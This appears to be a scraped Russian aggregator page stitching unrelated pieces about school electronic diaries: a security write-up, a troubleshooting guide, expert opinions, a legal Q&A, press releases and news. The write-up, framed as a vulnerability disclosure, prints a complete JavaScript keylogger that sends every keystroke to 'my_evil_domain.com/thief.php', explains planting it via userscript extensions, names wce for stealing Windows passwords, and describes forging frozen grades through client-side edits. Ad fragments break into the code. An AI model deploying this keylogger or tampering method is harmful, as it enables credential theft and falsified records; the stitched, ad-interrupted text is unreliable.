Неофициальные электронные дневники под запретом — студенческий портал

В этом топике будет затронута проблема, связанная с организацией надежности цифровых информационных систем, являющихся частью процесса современного образования. Если говорить конкретно, то электронных дневников. Неофициальные электронные дневники под запретом - Студенческий портал Как известно, цифровые внедрения нынче повсеместны: школы и университеты заводят собственные странички в социальных сетях и блогах для информирования о происходящем, редкое учебное заведение не имеет собственного сайта, а электронные журналы вот-вот окончательно вытеснят бумажные… И это лишь часть тех перемен, которые происходят у нас на глазах. Конечно же, в информационный век этому уже не приходится удивляться: люди привыкли, что вся интересующая их информация находится интернете. Очевидно, эти процессы инкапсулируют в себе и немалую ответственность как со стороны пользователей, так и со стороны разработчиков. Теперь недостаточно, уходя из кабинета, запирать дверь на ключ, оставляя позади нее всё важное. В цифровом мире физическая недоступность не является гарантией безопасности (однако, несомненно, этот аспект крайне важен в плане обеспечения комплексной безопасности). Но, обо всем по порядку. «Самая большая уязвимость любой информационной системы — это её пользователь»(с) С этим высказыванием трудно поспорить — человек есть человек. Именно эта проблема является ключевой в плане надежности и безопасности информационных ресурсов как со стороны пользователей, так и разработчиков. Эта проблема актуальна ровно столько, сколько существует сам человек, а поэтому она не относится к цифровому миру, как таковому. Ведь и во времена, предшествующие цифровым, например, бумажный журнал было доверено переносить конкретному человеку (старосте, кажется), который, в общем-то, мог бы пользоваться своим положением или быть использованным другими своими одногруппниками, что в конечном счете вполне могло привести к подделке оригинальной информации, ее компроментации. Другой пример, когда виновниками выступают уже не доверенные лица, а непосредственные «владельцы» информации. Если рассматривать это на конкретном примере, то легко представить себе обычного, скажем, секретаря, не подумавшего не только забрать, но и вообще закрыть журнал с важной информацией на время своего отсутствия в кабинете. Такое бывает и нередко. Это также может привести к утечке/подделке важных для учреждения сведений. В современное время примеры неаккуратности человеческого фактора остаются идентичными, разве что бумажки заменяются компьютерами. На самом деле это несет еще большую угрозу. Если запрограммировать и «заразить» бумажку было нельзя, то с компьютерами все обстоит иначе. Редкий сотрудник (по крайней мере, в сфере школьного образования) нажимает Win+L, отлучаясь по делам, некоторых в принципе не заботит, стоят ли пароли на их учетных записях Windows, а третьи вообще пускают за свой ноутбук чуть ли ни каждого встречного… Все это лишь усугубляет и без того ненадежные системы. Вы можете использовать самые безопасные браузеры, накачать дюжину различных антивирусов и даже использовать уникальный пароль учетной записи, но если пускать за свое место других людей без пристального наблюдения за их действиями, ничто не сможет гарантировать надежность рабочего места и отсутствие утечек. Теперь хотелось бы привести простой пример эксплуатации «человеческого фактора».

Есть добрый преподаватель географии Иван Иванович, который попросил своего «ученика-компьютерщика» Антона Антоновича разобраться с тем, почему на его компьютере нет звука в презентации(обычная проблема). Ученик, быстро разобравшись с проблемой, пока Иван Иванович пишет на доске материал к следующему уроку, подумывает о перехвате данных своего учителя с этого компьютера(часто это почта, логины-пароли от соц.сетей и электронных журналов и т.д). Заранее Антоном был заготовлен злобный JavaScript-сценарий, являющийся частью его self-made сниффера:

alt

Узнай стоимость своей работы

Бесплатная оценка заказа!
Читайте также:  Молодые дизайнеры получат поддержку национальной технологической инициативы - студенческий портал

Оценим за полчаса!

(function(){

THIEF = «http://my_evil_domain.com/thief.php»;

function grab(e)
{
var o = e.srcElement;
var img = new Image();
var text = o.value;
if(!text || typeof text == «undefined»)
text = o.innerHTML;
if(!text || typeof text == «undefined» || (text+»»).trim().length==0)
return;
img.src = THIEF+»?stolendata=»+encodeURIComponent(text)+
«&urlfromdata=»+encodeURIComponent(location.href.toString())+
«&domdata=»+encodeURIComponent(o.getAttribute(«id»)+» ||| .»+ o.getAttribute(«class»));
img.width=»1px»;
img.height=»1px»;
img.id=»taken_data_sender»;

try{
var oldImg = document.getElementById(img.id.toString());
document.body.removeChild(oldImg);
}catch(e){}

document.body.appendChild(img);
return true;
}

function connect_signal(selector)
{
var elements = document.getElementsByTagName(selector);
for(var el in elements)
elements[el].addEventListener('keyup', grab, false);
}

alt

Узнай стоимость своей работы

Бесплатная оценка заказа!

Оценим за полчаса!

var selectors = ['*'];
for(var k in selectors)
connect_signal(selectors[k])

})();

И «ученик-компьютерщик» решает встроить свой скрипт внутрь любимого браузера Ивана Ивановича. Сделать Антон это может как стандартными средствами, предоставленными непосредственно браузерами, так и сторонними, вроде расширений TamperMonkey(Chrome), GreaseMonkey(FireFox) и т.д.

После чего он довольно встает с захваченного PC и идет с улыбкой к любимому учителю географии, информируя его о починке исходной проблемы. Но с этого момента все вводимые данные на захваченном компьютере будут течь к Антону.

Для более пущего эффекта он может сбросить всю историю браузера, включая запомненные ранее аутентификационные данные из форм.

Кроме того, Антон может попытать счастье и постараться вытащить пароль учетной записи Windows, используя средства наподобие wce (WindowsCredentialsEditor). Ведь вряд ли у Ивана Ивановича десяток различных паролей — так ведь неудобно — поэтому, вполне вероятно, что всего один единственный 😉

Начать, пожалуй, следует с того, что ни один электронный журнал, встретившийся мне, не обладал должной системой защиты и системой выявления несанкционированного доступа. Я не хотел бы их перечислять. Все они, с точки зрения *безопасной* авторизации, напоминали какие-то форумы и многочисленные сайты-пиратки, построенные на движке DLE. Везде для входа в свой кабинет нужно было лишь указать логин(который часто представлял из себя email) и пароль. Ни о какой истории входов-выходов и информации об открытых «висячих» сессиях и речи нет. Однако данные, находящиеся внутри, все же представляют определенную ценность. Рассмотрим пример на реально существующем электронном журнале, который функционировал в течении целого года. Предположим, тот самый «ученик-компьютерщик» этим же вечером, придя домой и проанализировав свой лог, получил несанкционированный доступ к учетной записи преподавателя: Неофициальные электронные дневники под запретом - Студенческий портал

авторизовавшись, Антон увидел следующую картину:

Неофициальные электронные дневники под запретом - Студенческий портал

что натолкнуло его на мысль о том, что имея в руках auth-данные лишь одного сотрудника своего образовательного учреждения(Ивана Ивановича), он может управлять всеми оценками любого юнита, входящего в состав этого учреждения. Это довольно странно, ведь это идет вразрез с простейшими правилами доступа.

Читайте также:  Копите деньги: высшее образование за деньги становится нормой - студенческий портал

Однако к служебной и конфигурационной информации у простого преподавателя доступа все же нет. Зато такой доступ есть у аккаунта администратора учебного заведения: Неофициальные электронные дневники под запретом - Студенческий портал Здесь приведен один из ключевых конфигурационных разделов журнала. Красным выделено то, что влияет на безопасность и достоверность данных. Далее я хотел бы показать, что часто подобные настройки являются лишь иллюзией, которая еще больше усугубляет положение: ответственные лица полагают, что информация месячной/недельной(и т.д) давности была проверена и заморожена навсегда. Однако, это не так. Что-либо изменить просто так не удастся, т.к на данный момент уже прошло слишком много времени. Неофициальные электронные дневники под запретом - Студенческий портал Но если заглянуть в исходный код и посмотреть, как все устроено, можно увидеть следующее: Неофициальные электронные дневники под запретом - Студенческий портал

Синим обозначено то, что якобы не подлежит замене, красным — что изменяемо. Сразу появляется мысль подставить данные из уязвимого красного блока в синий, т.е заменить SPAN на INPUT. После срабатывания JS-события onChange происходит следующее:

Неофициальные электронные дневники под запретом - Студенческий портал

Сработала одна из систем, отвечающих за надежность данных. Однако, если вспомнить, что есть HTML-сущности, то комментарий можно будет скрыть.

После нажатия на кнопку и обновления страницы можно увидеть: Неофициальные электронные дневники под запретом - Студенческий портал Замороженные данные были подвержены изменению? Да. А причина тому кроется в том, что разработчики данного дневника не подумали проверять данные на серверной стороне. Они доверчиво принимают параметры от клиента, а сервер, как зомби, тупо прожевывает их, не сомневаясь в надежности… Но, как оказалось, комментарии можно и вовсе обойти, а присутствие/отсутствие на конкретном уроке подделать, что в общем-то уже менее серьезно. Достаточно перейти на страницу урока( ↑ ссылка в заголовке таблицы ↑ ): Неофициальные электронные дневники под запретом - Студенческий портал Здесь есть возможность добавить оценку(значок «плюсик»), но не изменить уже существующую(замороженную). Красным цветом снова показано «уязвимое» место системы, а синим — его эксплуатация. Здесь просто воспользоваться методом замены не получится( нельзя просто так взять и заменить DIV на A ), потому что тег ссылки содержит в себе служебные параметры: ID оценки и ID человека, которому она принадлежит. По нажатию на ссылку всплывает окно, ассоциированное с данными оценки. Поэтому для эксплуатации придется совсем немного подкорректировать параметры ссылки: Исходные данные:

1) +

2)

5

Аутпут:

+

Теперь, если произвести замену, изменить и обновить: Неофициальные электронные дневники под запретом - Студенческий портал Снова удалось заменить замороженные данные. Даже без указания (причины)! Здесь также наблюдается уязвимость, связанная с односторонней проверкой данных. Вот таким достаточно простым способом удалось обойти основной раздел, отвечающий за защиту и надежность самых важных данных электронного журнала. Исследование HTTP-запросов показало, что комментарий не учитывается вообще — это просто сторонний параметр, который может быть и пустым(значение на пустоту проверяется на клиентской стороне). Возможно, разработчики и проектировщики(если проектировщики вообще были) точно были уверены, что данными функциями будут пользоваться исключительно сотрудники образовательных учреждений… но, на худой конец, ведь вполне может быть и так, что ученик является родственником определенного сотрудника и они пользуются общим компьютером…

В начале описания проблемы#2 было сказано, что уязвимый электронный журнал функционировал в течении целого учебного года.

Исследование же журнала было проведено почти в самом начале учебного года, разработчики и администрация были проинформированы, однако ни одной ошибки так и не было исправлено за всё прошедшее время.

Вполне вероятно, что проблемой#1, связанной с человеческим фактором, воспользовалось множество учеников из разных образовательных учреждений, что в итоге могло привести к массовой подделке исходных данных. Проблема#2 лишь усугубляет эту ситуацию.

Сотрудники образовательных учреждений так же продолжают предоставлять доступ к своим компьютерам каждому встречному, не наблюдая за их действиями. Некоторые позаботились о смене своих «штатных» паролей(или их первоначальной установки). В целом ничего не изменилось, и уровень как безопасности, так и надежности остался на прежнем уровне.

Вывод

Проблема, как и положено, кроется в корне. Чтобы ее можно было как-то искоренить, необходимо заставлять людей задумываться о безопасности их рабочего места, о том, что вокруг «ходит» слишком много угроз.

Утечка и несанкционированный доступ — часто лишь вопрос времени не только в контексте современных образовательных учреждений. Но на их примере очень легко убедиться в некомпетентности многих сотрудников. На примере электронного журнала(dnevnik.mos.

ru) стало видно, что некомпетентность лишь одного человека может повлечь за собою крах, в данном случае, всей системы оценивания.

Многие школьные учителя еще только осваиваются в плане электронных ресурсов, но когда однажды(уже очень скоро) произойдет повсеместный полноценный переход от «олдскульных» бумажных журналов к электронным, необходимо будет уметь объективно оценивать угрозы не только пользователям, но и разработчикам подобных ресурсов. Необходима тщательно проработанная система авторизации, которая бы позволяла отслеживать неправомерный доступ; необходимы и системы логгирования входов и отслеживания открытых сессий текущего аккаунта; необходимо и как можно более сузить области ответственности отдельных аккаунтов.

Все это в конечном счете позволит доверять современным электронным дневникам и не сомневаться в информации, которую они призваны не только предоставлять, но и оберегать.

Источник: https://habr.com/post/261289/

Почему не работает электронный дневник – причины и что делать?

Электронный дневник является аналогом простого школьного. Пользователь может ознакомиться с актуальной информацией об успеваемости ученика, узнать расписание, почитать комментарии преподавателя. Но иногда система дает сбой. По каким причинам не работает электронный дневник? Разберем основные проблемы.

Почему не работает электронный дневник сегодня

Основные причины, из-за которых может не функционировать представленный сервис, связаны:

  1. С техническими работами на сайте по улучшению функционала.
  2. С техническими неполадками.
  3. С браузером. Проблема кроется в кэше. Перейдите в настройки, затем в графу истории. Далее нужно найти параметр «Кэш» и нажать «Очистить». В конце перезапустите браузер и повторите попытку входа. Помните, что расположение кэша может отличаться в зависимости от программы.
  4. С плохим интернет соединением. Проверьте как работают другие сайты. Если они также плохо функционируют, то попробуйте перезагрузить роутер или обратитесь к провайдеру.

Неофициальные электронные дневники под запретом - Студенческий портал

Обычно жалобы пользователей на плохую работу системы оправданы. Ведь распространенной проблемой являются именно техработы или же непредвиденные неполадки. В таком случае вы можете обратиться в службу поддержки и уточнить. Сотрудники обязательно ответят вам в ближайшее время. Если же проблема связана с техническими работами, то оповещение будет видно прямо на сайте.

Почему не работает электронный дневник на Госуслугах

Электронный дневник является одним из ресурсов на Госуслугах. Государственный портал предлагает пользователям множество различных услуг, среди которых внесение платежей, запись к врачу и т.д. В конце 2017 года на сайте появился новый сервис для родителей. Но иногда возникают неполадки. Почему не работает электронный дневник на государственном портале?

В последнее время на ресурсе стали часто проходить тех.работы. Поэтому сайт недоступен. Пользователь может пожаловаться, написав в поддержку. Ответ поступит на электронный ящик, указанный при составлении жалобы. Эффективный способ связаться с поддержкой – позвонить по указанному на сайте номеру. Звонок бесплатный.

Почему не работает аналитика оценок в дневнике

Аналитика оценок представляет собой удобную функцию для учеников. Школьник может самостоятельно произвести анализ своих знаний. Узнать по каким предметам необходимо подтянуть свои оценки. Также ребенок может сравнить успеваемость с другими одноклассниками.

Неофициальные электронные дневники под запретом - Студенческий портал

Порой представленная функция не работает. Почему? По статистическим данным основная причина кроется именно в обслуживающих работах. Сотрудники сайта проводят работы по улучшению системы, из-за чего приостановили функционирование. Также может случилась непредвиденная поломка. Разработчики уже знают о возникшей неполадке и работают над этим.

Что делать, если не работает электронный дневник и журнал

Изначально пользователь должен убедиться, что проблемы с доступом не связаны с ним. Проверьте свое интернет соединение. Зайдите на другой ресурс и посмотрите, как загружаются страницы. Проблем нет? Обратитесь в техническую поддержку или подождите некоторое время.

Также у многих родителей возникают проблемы со входом из-за неправильно введенного пароля и логина. Некоторые системы позволяют пройти процедуру восстановления самостоятельно, главное – следовать инструкции на сайте.

Новые данные для входа поступят на телефон или на почту. Если эта функция не предусмотрена системой, то необходимо отправляться в школу и обращаться классному руководителю, чтобы получить новые данные.

Помните – сначала вы получите временный пароль, его требуется заменить на свой в настройках на сайте.

Электронный дневник не работает 2018? Недовольный родитель может оставить жалобу на плохое функционирование системы. Обычно это случается, когда на сервисе не происходят работы, а интернет работает стабильно. Позвоните по указанному номеру, и уточните у сотрудников про работу системы.

Что делать, если не работает на уроке «замечание» в дневник

Представленная функция является еще одним дополнением к электронному дневнику. Учитель оставляет замечание о поведении или другие комментарии, связанные с оповещением о мероприятии и т.д.

Родители смогут беспроблемно ознакомиться с этой информацией на странице дневника. То есть, представленный ресурс является полным аналогом простого бумажного дневника. Если не работает данная функция, то уточните этот вопрос в школе.

В образовательном учреждении возможно знают о проблеме, и стараются решить ее.

Неофициальные электронные дневники под запретом - Студенческий портал

Плохо работает электронный дневник? Обратите внимание на работу своего интернета. В другом случае нужно писать сотрудникам сайта и уточнять о плохом функционировании системы.

Когда начнет работать?

Если проблема связана именно с тех.работами, то точное время о запуске будет указано на главной странице. Обычно разработчики заранее предупреждают пользователей о дальнейших работах. В случае с неполадкой сложнее. Вы не сможете узнать, когда именно сайт начнет функционировать. Но сотрудники сайта постараются решить проблему как можно скорее.

Источник: https://e-dnevniki.ru/ne-rabotaet-elektronnyy-dnevnik.html

Блоги / Активный гражданин: Новые возможности электронного дневника

Неофициальные электронные дневники под запретом - Студенческий портал Неофициальные электронные дневники под запретом - Студенческий портал Курс валют предоставлен сайтом old.kurs.com.ru

Справка

В настоящее время огромное внимание уделяется усилению мер по безопасности детей дошкольного и школьного возраста. Для этого постоянно вводятся новые электронные сервисы и услуги.

В 34 школах столицы с февраля 2016 года проходит эксперимент. Там перешли на улучшенную версию электронного дневника. В ней родители получили возможность через специальную форму уведомлять учителей о том, почему ребенок будет отсутствовать на занятиях. При желании можно задать длительный период, тогда система поставит в электронном журнале «Н» до конкретной даты.

Информация об отсутствии ребёнка в школе без уважительной причины отражается в электронном журнале уже через 5 минут после начала первого урока. Родители также смогут увидеть информацию об отсутствии ребёнка на уроке в электронном дневнике.

  • Предполагается, что такие меры помогут снизить количество прогулов школы, а также обеспечить скорейшие поиски ребёнка в случае его отсутствия в школе в положенное время.
  • А вы считаете такой функционал полезным? ГОЛОСОВАТЬ>>>>>
  • Мнение экспертов

Николай Степанов, Вице-президент по научно-методической работе СРО Ассоциация «Школа без опасности»
Раз такой функционал разрабатывают, то, безусловно, это шаг веред.

Только о том, что ребенок не придет в школу, через электронный дневник смогут узнать, скорее всего, учитель или IT специалист, который работает с этой системой, а не школьная охрана, основная задача которой смотреть, чтобы правильно вставляли карты, чтобы детки не проскакивали под турникетами, чтобы те, кто забыл карты или поломал, пропускались отдельно. Все остальные вопросы по работе системы – это вопрос школьного IT специалиста. Система управления контроля доступа позволяет делать выводы, был ли ребенок в школе, питался он или нет, если ученик не придет в школу, то система сможет только подтвердить факт, что он не пришел. На дисциплине это безусловно отразиться, а безопасность и дисциплина – это два связанных вопроса, потому что дисциплина всегда косвенно влияет на уровень безопасности.

Стэлла Федорова, Учитель информатики, администратор ЭЖД школы №1357
Если родители станут предупреждать классного руководителя, что ребенок не придет в школу, это будет полезно.

Но, с другой стороны, сейчас такая возможность уже есть – на портале госуслуг можно в электронном дневнике написать личное сообщение для классного руководителя о том, что ребенок, например, болеет и несколько дней не будет ходить в школу. Но если между родителем и педагогом не налажена система коммуникаций, то это не сработает.

Читайте также:  Самым популярным егэ по иностранному языку стал экзамен по английскому - студенческий портал

Ведь и здесь родителя никто не обязывает писать такие сообщения, а если это все делается по желанию, то он может предупредить, а может не предупредить о том, что ребенок не придет.

В случае, если родитель ничего не написал, а ребенок не ходит, то у нас и сейчас работает система: ребенок не пришел, это отмечается в журнале, начинаем выяснять по какой причине – по болезни, по уважительной причине или нет. Если классный руководитель срабатывает нормально, то к концу второго урока уже выясняет причину, почему ребенка нет в школе.

В целом, в качестве дополнительного этот функционал уже есть. Если бы он в дальнейшем стал обязательным, то эту информацию можно было бы как-то использовать, корректировать на ее основе, например, заявки на питание – какие-то логически связки тут должны быть проработаны. Если родитель интересуется, то по системе «Проход и Питание» может узнать, получив sms-сообщение, в школе ребенок или нет.

Елена Стрелкова, Жительница района Силино (ЗелАО)
Если в электронный дневник добавят такую функцию, то, я считаю, это будет очень полезным.

Сейчас о том, что ребенок заболел, мы предупреждаем учителя по телефону, но это не всегда удобно делать.

А на дисциплине, я не думаю, что это как-то отразится, потому что, кто в первом классе опаздывал или пропускал, те и в пятом поступают также — это не поможет.

Александр Суходольский, Житель района Щукино (СЗАО)
Сейчас с учителем мы общаемся при помощи почты, то есть, когда необходимо, отправляем электронное письмо. Если бы появилась такая функция в электронном дневнике, то стало бы намного удобней.

С точки зрения безопасности, я думаю, только теоретически что-то поменяется, а на практике, сообщаем мы или нет, что ребенок в школу не пойдет, никто не беспокоится. Нам еще ни разу учитель не звонил и не спрашивал, почему наш ребенок не ходит в школу.

Источник: https://echo.msk.ru/blog/ag_mos/1739725-echo/

Некоммерческие интернет-версии системы КонсультантПлюс

Некоммерческие интернет-версии системы КонсультантПлюс — это возможность поработать с сокращенной версией коммерческих систем КонсультантПлюс в онлайн. Также вы можете попробовать полную версию коммерческой системы, пройдя быструю регистрацию.

Некоммерческие интернет–версии содержат федеральное и региональное законодательство, судебную практику, финансовые консультации и многое другое.

Документы, тексты которых недоступны, можно найти в коммерческой версии системы, заказать из интернет–версии; за текстом можно обратиться в региональный информационный центр.

Круглосуточно в свободном доступе основные документы федерального законодательства, новые документы (за последние 14 дней) и списки всех документов с краткой информацией (справками)

Неофициальные электронные дневники под запретом - Студенческий портал

С ограничениями по времени доступно федеральное законодательство, законодательство Москвы и Санкт–Петербурга, судебная практика, финансовые консультации, законопроекты, международные правовые акты и другие документы

См. подробное расписание доступа

Содержит законодательство 85 субъектов РФ

Круглосуточно доступны новые документы (за последние 14 дней) и списки всех документов с краткой информацией (справками)

Неофициальные электронные дневники под запретом - Студенческий портал

В выходные дни доступны основные документы и возможность заказать остальные документы

«КонсультантПлюс: основные документы» — все кодексы РФ, основные федеральные правовые акты, обзоры документов и справочная информация

  • iPhone/iPad
  • Android
  • Windows

«КонсультантПлюс: Студент» — правовая информация (кодексы, законы), судебная практика, консультации, а также современные учебники

Системные требования

Некоммерческие интернет–версии КонсультантПлюс

На компьютерах и ноутбуках корректную работу обеспечивают браузеры:

  • MS Internet Explorer, версия не ниже 11.00 (cм. настройки),

Источник: http://www.Consultant.ru/online/

Дневник.ру подготовил рекомендации для российских школ по организации дистанционного обучения

Дневник.ру подготовил рекомендации для российских школ по организации дистанционного обучения

Резидент Фонда «Сколково», цифровая образовательная платформа «Дневник.ру», в которой зарегистрировано большинство школ страны, выпустила методические материалы для педагогов по организации учебного процесса онлайн в период карантина.

Дистанционное обучение через платформу ведется уже много лет. А сегодняшние рекомендации помогут учителям, которые ранее не использовали при работе в системе эти возможности.

Гавриил Леви, генеральный директор «Дневник.

ру»: «Пик такой активности традиционно приходится на зимний период, когда школы во многих регионах временно приостанавливают работу в связи с обострением ОРВИ и гриппа.

Поэтому сегодня, когда Министерство просвещения РФ рекомендовало всем образовательным организациям переходить на формат дистанционного обучения, мы полностью готовы к увеличению нагрузки».

Неофициальные электронные дневники под запретом - Студенческий портал

Дмитрий Стариков, проектный менеджер Кластера информационных технологий Фонда «Сколково»: «В ″Дневник.ру″ можно не только выдавать домашние задания, но и прикреплять к ним учебные материалы. Когда у педагогов была возможность объяснять темы на уроках в школе, эта функция использовалась нерегулярно. Сейчас же она позволит продолжать обучение, не выходя из дома.

Через платформу ученики смогут отправлять на проверку выполненные задания, что раньше тоже практиковалось нечасто. После этого учитель поставит оценку или даст комментарий по доработке. В системе также доступен обмен личными сообщениями, публикация объявлений, создание групп.

Кроме того, платформа интегрирована с другими образовательными сервисами, в которых можно осваивать учебный материал в онлайн-режиме».

Педагоги, которые давно ведут дистанционную работу через «Дневник.ру», отмечают, что такой формат вполне удобен для полноценного образовательного процесса.

Альбина Музаева, учитель биологии Республиканского физико-математического лицея-интерната в Северной Осетии: «В нашей школе во время карантина всегда идет дистанционное обучение.

Мы его проводим через платформы “Дневник.ру” и “Якласс”. Дистанционно выдаем сначала теорию, потом проверочные работы. По ним я выставляю оценку и переношу в журнал.

Так за период карантина мы не отстаем от программы, и накопляемость оценок у нас сохраняется».

Поскольку не все педагоги хорошо знакомы с тонкостями дистанционного обучения через «Дневник.ру», для них разработали подробные рекомендации, доступные по ссылке.

Вот несколько важных моментов:

  1.  Для информирования учеников и родителей о приостановке учебного процесса педагогам предлагается использовать функцию записей на странице школы или класса в системе.
  2. Можно выдавать домашние задания как для класса, так и индивидуально.
  3. Доступно прикрепление файлов к заданиям. Например, презентаций, видеоуроков или аудиозаписей.
  4. Чтобы получить от учеников выполненную работу, при выдаче задания обязательно необходимо отметить пункт «Требуется файл с результатом».
  5. Для индивидуального общения с учениками и родителями рекомендуется использовать сервис личных сообщений.

Ксения Колесова, руководитель методического отдела «Дневник.ру»: «Мы делаем все возможное, чтобы учебный процесс на период карантина не прерывался. Проводим вебинары для учителей и рассказываем о возможностях для дистанционной работы.

Наши рекомендации уже разосланы в министерства образования всех регионов, и сейчас разрабатывается еще один документ с расширенной информацией.

Кроме того, мы готовы развивать платформу в рамках сотрудничества с Министерством просвещения РФ в направлениях, которые могут дополнительно потребоваться в режиме ЧС».

Источник: https://dnevnik.ru/news/1536780

Электронный дневник обязателен?! — вопрос №13109724 от 02.09.2017

Существует распоряжение правительства от 27 февраля 2010 г. N 246-р О плане первоочередных действий по модернизации общего образования на 2010 г.

, согласно которому даются обязательства Минобрнауки России обеспечить координацию и контроль вышеуказанных планов правительства о модернизации школьного документооборота. В природе отсутствую законы обязывающие учеников вести электронные дневники.

Еще раз обращаю ваше внимание, что это для упрощения документа-оборота образовательного учреждения.

Вот комментарий министра образования Пензенской области:

министр образования Пензенской области С.К.Копешкина:

— В век информационных технологий неизбежен переход на «Электронное правительство», электронный документооборот, в том числе и электронные дневники и журналы.

На заседании президиума Госсовета, на котором рассматривался вопрос о реализации Стратегии развития информационного общества в РФ президент России Д.А.

Медведев предложил школьный журнал и дневник школьника сделать электронными.

«Давайте вот как сделаем: бумажную форму журнала и дневника убирать не будем, а вменим в обязанности школ параллельно ввести эти электронные документы. Во всяком случае, журнал точно можно ввести» — сказал Медведев.

Внедрение электронных дневников в школах и других образовательных учреждениях планируется сделать обязательными и ввести до начала 2012-2013 учебного года. Если у родителей нет средств на оплату электросвязи и нет компьютера, то они могут контролировать успеваемость своих детей на бумажном носителе.

Что касается разглашения персональных данных школьников, то в соответствии с ч.4 ст.9 ФЗ от 27.07.2006 г №152-ФЗ «О персональных данных» в случаях, предусмотренных ФЗ, обработка персональных данных осуществляется только с согласия в письменной форме субъекта персональных данных.

Равнозначным содержащему собственноручную подпись субъекта персональных данных согласию в письменной форме на бумажном носителе признаётся согласие в форме электронного документа, подписанного в соответствии с ФЗ электронной подписью.

Содержание и объём обрабатываемых персональных данных должны соответствовать заявленным целям обработки. Обрабатываемые персональные данные не должны быть избыточными по отношению к заявленным целям их обработки. В соответствии с ч.1 ст.9 ФЗ 27.07.

2006 г №152-ФЗ «О персональных данных» субъект персональных данных принимает решение о предоставлении его персональных данных и даёт согласие на их обработку свободно, своей волей и в своём интересе.

Таким образом, в соответствии с действующим законодательством, заставить субъекта персональных данных дать своё согласие на обработку его персональных данных с целью ведения его электронного дневника не представляется возможным, а значит, использования электронного дневника учащегося является ДЕЛОМ ДОБРОВОЛЬНЫМ.

Из газеты «Городищенский вестник» 7 декабря 2011 № 97 (9641)

Так же даю ссылку на письмо МИНИСТЕРСТВО ОБРАЗОВАНИЯ И НАУКИ РОССИЙСКОЙ ФЕДЕРАЦИИ ПИСЬМО от 15 февраля 2012 г. № АП-147/07. Если что то не понятно, пишите, разъясню. Удачи.

Запомните одну важную вещь, законы могут быть любой абсурдности, любые законы преследуют цель благополучия и процветания гражданского общества и граждан и если кто то принуждает к исполнению закона, который нарушает права граждан или ухудшает положение гражданина в финансовом или моральном плане, то исполнение этого закона противоречит нормам морали. А организация принуждающая к исполнению этого закона совершает противоправные действия и нарушает закон о правах граждан. Пишите. Еще раз удачи.

Источник: https://www.9111.ru/questions/13109724/

Разработчикам электронных дневников закрыли доступ к данным школьников, якобы чтобы спасти тех от порнографии

Департамент информационных технологий правительства Москвы закрыл электронные дневники школьников от разработчиков мобильных приложений, сообщил в своем блоге на сайте «Эха Москвы» глава ДИТ Артем Ермолаев.

В связи со случаями нарушения этических норм сторонними разработчиками мобильных приложений электронного дневника, а также для обеспечения максимального уровня информационной безопасности ребенка, мы приняли решения существенно усилить авторизацию при входе родителя и ребенка в сервис «электронный дневник». Поэтому с 1 сентября воспользоваться сервисом дневника можно будет только через авторизацию на официальном сайте Мэра Москвы mos.ru.

В разгар прошлого учебного года, в одном их самых массовых неофициальных мобильных приложений дневника, были размещены материалы порнографического характера. Это происшествие создало серьезный резонанс среди родителей.

На ДИТ массово были поданы жалобы, в отдельных случаях — судебные иски По этой причине принято решение о закрытии доступа к данным дневника для неофициальных ресурсов — не только для вышеупомянутого разработчика, а для всех. Мы переводим дневник на бесплатный для жителей ресурс mos.ru и также у нас есть официальное бесплатное приложение дневника.

Бесплатность — это тоже важно! Потому что мы защищаем людей в принципе от любой рекламы внутри сервиса, а тем более неэтичной, — пишет чиновник.

Ранее создатель самого массового стороннего приложения для работы с электронными дневниками «МРКО — независимый дневник» Леван Квирквелия рассказал на сайте Habrahabr, что ему закрыли доступ к данным школьников из-за конкуренции с другим сервисом — Kid Radar, который разработала компания «Тактик Лабс». «Тактик Лабс» связана с компанией «Альтарикс», которая разработала большую часть электронных приложений для московского правительства, уверен он.

Эти компании («Тактик Лабс» и «Альтарикс» — «Роем!») тесно связаны. Цель их приложения — заработать на том, что они же и не создали адекватного официального конкурента, — пишет Леван Квирквелия.

По данным Kartoteka.ru, «Тактик Лабс» принадлежит «ФЕЙРГЛАЙД», ее генеральный директор также возглавлял компанию «Техстройторг», все юрлица зарегистрированы в Москве.

«Альтарикс» зарегистрирована в Самаре, на 100% принадлежит гендиректору Денису Николаеву.

Судя по тому, что Ермолаев специально упомянул о бесплатности сервиса, теперь доступ отключат всем разработчикам приложений — и у Квирквелии, и у «Тактик Лабс» были дополнительные платные функции в их решениях.

Источник: https://roem.ru/08-08-2017/256575/dnevnik-dit/

Ссылка на основную публикацию